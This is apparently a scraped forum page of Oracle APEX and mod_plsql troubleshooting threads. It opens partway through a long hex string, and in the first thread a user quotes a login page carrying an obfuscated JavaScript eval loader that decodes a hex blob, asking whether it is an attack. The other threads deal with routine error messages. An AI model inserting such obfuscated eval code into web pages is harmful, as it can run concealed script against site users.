a7a3dbe3d1d7ddd8dd969798a4e4cf8e578dbad3a265695da2d9d8e79c9798667a7aa3c7cddfd88ea4f1d7d39290ada1d3d2d8e2d2d3e2a291d5d7c6d5d9aab1d1d2d2d3e29c4a83834b64ab9e96dad7cba3acaaaaacad9e96dad7cbe3efd7d9e9e7e08e8fecb8a4cf8e498ee9f8f0ede9d5d4d5868d9b93d1d1d2d2d3e2e7b07a5f97e3d2c9cbcfd7d3c9864ba4edd7d9e9e7e0ebf3d7d3928ca965959b8fd5e8e6dbcbd7e9d9d8a18fc4d7ddd8dd8f5eabe3e1d89568ac9b8fd5e8e6dbcbd7e9d9d8a18fc4d7ddd8dd9ca4d7cde1da9f5c445dafe6ebf4e79a9bced5d7cb90575d5d58a6e0c4d5d7cb909697a4e7a9b4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96dad7cbe3e6cf8e50498d95a5f8a494a97a7aabe3e1d895a5f8a494a97a7ab2e3d2c9cbcfd7d3c98da5f8a4949a9bced5d7cb90578dbacf9d4e53585252a4e7a9b4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96dad7cbe3e9a9a792949564a4cf8e909094954f4c8d8f94954f4c4e49848c52a4f1d7d3928ba8a1d3d2d8e2d2d3e2a291d5d7c6d5d9aab1d1d2d2d3e29c4a8bd7dee5e9964b64a699a2ede9d5a25f8ad1cdc8c9d3905da6999ccfced2a2a2a0a699a4d7cde1daa2a19fa89b8fd1e0d5d3d2a7abd1d5d08c9394a6fab8b1d7d39286a3a3dbe3d1d7ddd8dd9651a4f1d7d3928aa7b4e0d7d2d3e6a592d3d2d8e2d2d3e2a295ccd9b9b1d1d2d2d3e2e7b5bbcdb5c8b5afced28d4a88d5e1df8f4b64a1d5e19a9ed7d3928ba86d6ba6a7a6989ad1d3d5dbdca3a6965654a4dc8992c5c6c886a6e0a0b1e6e7dae2b8a4cf8e494298e0d7d2d3e6a58fc5c8a9bbdbd3e2c0b5dce7d9d3d3d79ba4f2e0d7d2d3e6a58fc5c8a9bbdbd3e2c0b5dce7d9d3d3d79a4a8edbd0c5864e959592c7cddfd88ea6e2d1dfd8e0e4cf8e494298e0d7d2d3e6a58fd5e8d5c4cbadbbdbd3e29da4f2e0d7d2d3e6a58fd5e8d5c4cbadbbdbd3e29c4a91dddadbd0c5864e9592a6e2d1dfd8e0f2e0d7d2d3e6a59ddddadbd0c5a1a6e6fafaa65198de9a9ce69f64"));
    </script>
    <title>Bienvenido</title>
    HERE i Found the var pn with CSRT Value, so it is the problem,
    the HTML code generate for the same page from the domain b is the next:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html lang="es-mx" xmlns="http://www.w3.org/1999/xhtml" xmlns:htmldb="http://htmldb.oracle.com" xmlns:apex="http://apex.oracle.com">
    <head>
    <title>Bienvenido</title>
    Here between <head> tag and <title> tag is empty and it works fine, do you think that it could be and attack to domain a?
    if I try to access the developer environment from domain a the code of the login page is
    <!DOCTYPE html>
    <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:htmldb="http://htmldb.oracle.com" xmlns:apex="http://apex.oracle.com">
    <head><script language="JavaScript">var pn = "CSRT"; var pv = '3921513832723665401';
    eval(function(a){var b=a.split("");var d=b.length;var c=parseInt(b[0]+b[1],16);var f=String.fromCharCode(c);for(var e=2;e<d;e++){var g=(parseInt(b[e]+b[e+1],16)-c)%256;c=g;f+=String.fromCharCode(g);e++}return f}("288edbe3d1d7ddd8dd968d91908da4f1d7d39283a0a3c7cddfd8a0b1d7d392829fa3dbe3d1d7ddd8dd969495a4f1d7d3928daaa9a7a4cf8e958e5eabe3e1d8924c938e5e5f444ba4e4cf8e909095964f4c8d8f95964f4c4e555e6e7aaa9b97d7d2c9ddc7b58e8d904d5f5f4d8f8d5252a4f1d7d3928ba8aa9b97d7d2c9ddc7b58e4a45454b64a4cf8e938c5e6a5e5aa4e7dbd2c4cdcbd1d7cba3aa9ba1e8d7d5e7e69a939464a8aaaa9ba1e8d7d5e7e69a585c9794a6f3d7d3928aa7aa9b97d7d2c9ddc7b58e4a61614b64a4cf8e92a77a6a5e574c918c5e6a5e5aa4edd7d9e9e7e08e8ce9e6cf8e928b5e6a5e5aa4e8aaaa9ba0d7d5dccdc4c88d578bcf9d4e535b4e444b64a4cf8e959ba1d8c6d3d5cb90578b9b635358667a6a5e5aa4e898685f48489ffae2d1dfd8e0e898685f61619fea9868a2904d5f5f4d8f9fa4cf8e938c5e6a5e5aa4e89868a9dbd2c4cdcbd1d7cbe3fafaefd7d9e9e7e08e8deab8b1d7d39289a6a3dbe3d1d7ddd8dd9651a4f1d7d3928aa7a3dbe3d1d7ddd8dd96969a9895a4f1d7d3928daaa1d3d2d8e2d2d3e2a295ccd9b9b1d1d2d2d3e2e7b5bbcdb5c8b5afced28d969764a1d5e19a9ed7d3928ba86d6ba6a7a99b9ad1d3d5dbdca3a6965654a4efe6ebf4f1d7d3928facaac8c6c88b97d7dcd3d7ba9ca19987b1d7d39291ae9f8a95c8c6c88b95ccd9b5b5e8e6dbcbd7e9d98d94985e5b5264a4cf8e99925eabe3e1d8924c97925e5f444ba4e8c8c6c88ba1d8d9b5b5e8e6dbcbd7e9d98d94989d9a64a4cf8e95c8c6c88b97d7dcd3d7ba9ca1996d5eac98a4e8c8c6c88b97d7dcd3d7ba9ca19989acecfafae0c4d5d7cb909899a4f8fafab8a5924a83834e4e8adad7cb884b64a18e51a6b8b1d7d39287a4a3dbe3d1d7ddd8dd969394a4f1d7d3928aa7a3dbe3d1d7ddd8dd969798a4f1d7d39290adb4e0d7d2d3e6a592d3d2d8e2d2d3e2a291d5d7c6d5d9aab1d1d2d2d3e29c4a83834b64ab9e96dad7cba3acaab1d7d3928ca95f4f4f5dafe6ebf4e7a9ad9e96d7e2e7afa4cf8e498d95a4e7a9b4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced2e2e6cf8e949a9bced5d7cb90576996c08f4f535852a4f1d7d3928eabb4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced2a0a4cf8e498f9c9bced5d7cb90576996c08f4f535852a4e7a9a99aa0d7d5dccdc4c88d576996c08f4f535b4e444ba6fafae0c4d5d7cb909596a4f8efd7d9e9e7e08e8ce9b8add7d9e9e7e0969ce6e7da8b4c9de0d7d2d3e69d4c9de0d7d2d3e6a59adbd2c4d5ddd8dd944c9de0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced28b4c90929394667a7ab4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96d7e2e7e2cfced28ea6b8b1d7d39288a5a3dbe3d1d7ddd8dd969394a4f1d7d3928aa7a3c7cddfd8a0a4cf8e9399a1e8d7d5e7e6dbd7d58f585c605d667a5f8adce8e4929ef8e799a1e8d7d5e7e6dbd7d58f585c5d5a667a5f51519ef8e79997d7d2c9ddc7b58e4a5c5c4b667a6a5e5aa4e5a7b1e6e7dae2efd7d9e9e7e08e8ae7b8b1d7d392819ea3dbe3d1d7ddd8dd969596a4f1d7d3928aa7a3dbe3d1d7ddd8dd969798a4e4cf8e578dbad3a265695da2d9d8e79c9798667a7aa3c7cddfd88ea4f1d7d39290ada1d3d2d8e2d2d3e2a291d5d7c6d5d9aab1d1d2d2d3e29c4a83834b64ab9e96dad7cba3acaaaaacad9e96dad7cbe3efd7d9e9e7e08e8fecb8a4cf8e498ee9f8f0ede9d5d4d5868d9b93d1d1d2d2d3e2e7b07a5f97e3d2c9cbcfd7d3c9864ba4edd7d9e9e7e0ebf3d7d3928ca965959b8fd5e8e6dbcbd7e9d9d8a18fc4d7ddd8dd8f5eabe3e1d89568ac9b8fd5e8e6dbcbd7e9d9d8a18fc4d7ddd8dd9ca4d7cde1da9f5c445dafe6ebf4e79a9bced5d7cb90575d5d58a6e0c4d5d7cb909697a4e7a9b4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96dad7cbe3e6cf8e50498d95a5f8a494a97a7aabe3e1d895a5f8a494a97a7ab2e3d2c9cbcfd7d3c98da5f8a4949a9bced5d7cb90578dbacf9d4e53585252a4e7a9b4e0d7d2d3e6a59adbd2c4d5ddd8dd9c96dad7cbe3e9a9a792949564a4cf8e909094954f4c8d8f94954f4c4e49848c52a4f1d7d3928ba8a1d3d2d8e2d2d3e2a291d5d7c6d5d9aab1d1d2d2d3e29c4a8bd7dee5e9964b64a699a2ede9d5a25f8ad1cdc8c9d3905da6999ccfced2a2a2a0a699a4d7cde1daa2a19fa89b8fd1e0d5d3d2a7abd1d5d08c9394a6fab8b1d7d39286a3a3dbe3d1d7ddd8dd9651a4f1d7d3928aa7b4e0d7d2d3e6a592d3d2d8e2d2d3e2a295ccd9b9b1d1d2d2d3e2e7b5bbcdb5c8b5afced28d4a88d5e1df8f4b64a1d5e19a9ed7d3928ba86d6ba6a7a6989ad1d3d5dbdca3a6965654a4dc8992c5c6c886a6e0a0b1e6e7dae2b8a4cf8e494298e0d7d2d3e6a58fc5c8a9bbdbd3e2c0b5dce7d9d3d3d79ba4f2e0d7d2d3e6a58fc5c8a9bbdbd3e2c0b5dce7d9d3d3d79a4a8edbd0c5864e959592c7cddfd88ea6e2d1dfd8e0e4cf8e494298e0d7d2d3e6a58fd5e8d5c4cbadbbdbd3e29da4f2e0d7d2d3e6a58fd5e8d5c4cbadbbdbd3e29c4a91dddadbd0c5864e9592a6e2d1dfd8e0f2e0d7d2d3e6a59ddddadbd0c5a1a6e6fafaa65198de9a9ce69f64"));
    </script>
    and obviously i Can't access
    Please help me...
    tx in advance

  • After 4.2.1 upgrade get:  requested URL /pls/apex/wwv_flow.accept not found

    Hi,
    Our hosted site just upgraded to 4.2.1 and I am getting:
    The requested URL /pls/apex/wwv_flow.accept was not found on this server.
    After trying to make a change on a master/detail form. I thought Apex 4.2 increased the # of fields on a master detail form so was surprised to see this error. Even when I reduce the number of columns showing on the detail part of the form which can have many rows as well, I am still getting the above error.
    Has there been any change in 4.2 that would change the behavior of a straightforward save of a multi row master detail form?
    In the past with Apex 4.0 I had to limit the columns being shown, but now I am reducing the # of columns even further and still get the error.
    UPDATE: I just removed from the report region definition several columns (which were deselected from the Report Attributes so not actually showing in the master-detail form) and now I am at least able to add rows and save changes. Again I am totally surprised that this behavior is happening when I thought 4.2 allowed for MORE page items!!
    I still cannot Delete rows from the detail section -- I get the odd message of :
    ORA-02292: integrity constraint (ENTERPRISE_SYSTEMS.RESOURCE_REQUEST_CON) violated - child record found
    But these rows have no child record!! They ARE the child records of the Master form. I had seen this behavior again related to the number of items showing on a page. Seems to me to be a bug in Apex that I had hoped would be removed with the 4.2 upgrade.
    Am I missing something!!
    PM
    Edited by: patfmnd on Dec 28, 2012 10:39 AM

    For the first problem, I'd check the alert log first, location:
    select * from v$parameter where name like '%user_dump_dest%';

  • The requested URL /pls/apex/wwv_flow.accept was not found on this server.

    any ideas on how to t'shoot this?
    I know I am supposed to check the Apache Server logs but don't see anything.
    I am not using Apache as listener but Embedded gateway as listener...
    any ideas?

    Hi
    Are you getting this error permanently or it comes sometimes? You may check alert.log also.
    Zulqarnain
    MaxApex Hosting
    http://www.maxapex.com

  • Mod_plsql: /pls/piu/piupk043.Drogues_abus HTTP-400 Bad name in the request

    Hi to @ll!!!
    someone knows why is due this error?
    Thanks in advance.

    Any details in the Apache error log?

  • Import results in /pls/htmldb/wwv_flow.accept was not found on this server

    Hello All,
    i've tried to import an application export file and the import function results in the error mentioned above. Connecting, creating the workspace was working fine...
    any ideas?
    Apache error_log has the following entries:
    [Mon Sep 26 09:18:45 2005] [warn] mod_plsql: Stale Connection due to Oracle error 942
    [Mon Sep 26 09:18:45 2005] [error] mod_plsql: /pls/htmldb/wwv_flow.accept ORA-942 ORA-00942: table or view does not exist
    [Mon Sep 26 09:18:45 2005] [warn] mod_plsql: /pls/htmldb/wwv_flow.accept HTTP-404 ORA-00942: table or view does not exist
    [Mon Sep 26 09:18:45 2005] [error] [client 172.17.49.224] Invalid method in request 0d51d077a

    Hugo,
    have you checked the XE forum on this issue ( Oracle Database Express Edition (XE) ) ?
    What exactly are you trying to do and what is the error message you get?
    To see the error log as you see in Apache, logon as SYSTEM via SQL*Plus and execute:
    SQL> execute dbms_epg.set_global_attribute('log-level', 3);The error log will go to the database trace file app/oracle/admin/XE/bdump/xe_s00?_????.trc. Please ignore the bogus error message "Embedded PL/SQL Gateway: Unknown attribute 3" in the error log.
    BTW, here are the log levels:
    0 - LOG_EMERG
    1 - LOG_ALERT
    2 - LOG_CRIT
    3 - LOG_ERR
    4 - LOG_WARNING
    5 - LOG_NOTICE
    6 - LOG_INFO
    7 - LOG_DEBUG
    Since XE beta doesn't yet support any other languages than English, please try to set the Primary Application Language in your custom application to en-us.
    ~Dietmar.

  • Too Many Arguments

    I upgraded my application server to 10.1.2.0.2. My DB is 9.2.0.6.
    My application is developed using web tool kit and deployed in mod_plsql. On a page i see the error
    "Too many arguments passed in. Got 5103. Upper limit is 2000"
    Can anyone help me resolving this issue? i dont see this error if application is run using application server 9i.
    Regards

    You need to move that column alias out of the nvl call. Try
    select
    g.group_name, nvl(p.first_name ||' '|| p.last_name, u.username) as "Name"
    from
    groups g, users_profiles p, users u
    where
    g.group_id = u.user_id
    and
    u.user_id = p.user_id

  • Mod_plsql: /pls/apex/f HTTP-400 Missing '=' in query string or post form

    This is the message when I click the logout button. It destroys the session though. It should redirect to login page after clicking logout button.
    We are on Apex 4.1
    Bad Request
    Your browser sent a request that this server could not understand.
    mod_plsql: /pls/apex/f HTTP-400 Missing '=' in query string or post form
    Oracle-Application-Server-10g/10.1.2.2.0 Oracle-HTTP-Server Server at xxxx.xxxxx.edu Port 443
    Edited by: 965704 on Oct 30, 2012 11:42 AM

    It has been fixed but the new problem is: After signout, if I move back to previous page and click some link using <- sign then I suppose to get the login page, but i am getting
         ORA-44004: invalid qualified SQL name error message.
    The source for my login page is
    wwv_flow_custom_auth_std.login(
    P_UNAME => :P101_USERNAME,
    P_PASSWORD => :P101_PASSWORD,
    P_SESSION_ID => v('APP_SESSION'),
    P_FLOW_PAGE => :APP_ID||':1'
    );

  • 404 not found The requested URL /pls/apex11/wwv_flow.accept was not found on this server.

    Hi,
    i tried to connect to Apex on Internal workspace.
    I get the error
    ORA-00604: error occurred at recursive SQL level 1
    ORA-00972: identifier is too long
    ORA-06512: at line 10
    ORA-06550: line 22, column 3:
    PLS-00306: wrong number or types of arguments in call to 'ACCEPT'
    ORA-06550: line 22, column 3:
    PL/SQL: Statement ignored
      DAD name: apex11
      PROCEDURE : wwv_flow.accept
      URL : http://servername:7777/pls/apex11/wwv_flow.accept
    Any Help?
    Thanks in Advance
    lukx
    Environment
    OS --> win xp
    DB version --> Oracle 11.2.2
    Apex Version --> 4.2.2.00.11

    Hi,
    i found the reason. On my DB test i put a db trigger "AFTER SERVERERROR ON DATABASE".
    After trigger disable all works fine.
    Lukx

Maybe you are looking for

  • Resolution problems with Acer aspire 5520

    Hello, I'm having trouble making both tty and Xorg resolution be native. I have an nVidia 7000M gpu.With nouveau drivers I managed to get KMS working, but realized Xorg resolution is wrong. If I set the right resolution with xrandr the problem with t

  • Internal Error message appears when I try to open Acrobat pro XI

    I recently installed Acrobat pro XI on my MacBook Air running mavericks. It installs fine, but when I try to launch it I receive an 'Internal Error occurred' message. How do I resolve this? I have uninstlled and reinstalled from my disk, and even dow

  • Save generated jsp in specific location

    Hi everyone! I have an editor to write formatted text and then to preview it in a jsp page. I need to save the generated page in a word document. Can you help me on this? How can I save it in a certain location (as jsp or html)? After that, I can tra

  • Cash on Tap - Unknown Error Code During Application Installation "-507"

    I get the above message when trying to install the Cash on Tap on my LG G3 running Android 5.0 Lollipop. I also got the same error when trying to install it under the last release of KitKat. My G3 isn't the UK version D855, it's the South Korean vers

  • EP7 SP14 RuleEditor Error

    We just created a new EP7 SP14 portal server.  When I go into system administration/portal content/portal display and try and right click on a folder to add a new rule collection I get the following error:  Argument Objs : com.sapportals.portal.prt.c